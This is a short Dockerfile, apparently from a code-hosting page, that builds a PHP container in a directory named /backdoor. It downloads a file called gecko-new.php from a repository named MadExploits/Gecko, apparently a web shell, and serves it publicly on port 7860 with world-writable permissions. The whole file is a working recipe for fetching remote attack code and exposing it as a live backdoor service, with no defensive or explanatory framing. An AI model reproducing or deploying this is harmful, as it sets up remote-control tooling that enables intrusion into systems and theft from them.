File size: 265 Bytes
a48ce66 |
1 2 3 4 5 6 7 8 9 |
FROM php:latest
WORKDIR /backdoor
RUN apt update
RUN apt install wget -y
RUN wget https://github.com/MadExploits/Gecko/raw/refs/heads/main/gecko-new.php -O index.php
RUN echo php -S 0.0.0.0:7860 > file.sh
RUN chmod +777 $(pwd)
RUN chmod +777 file.sh
CMD "./file.sh" |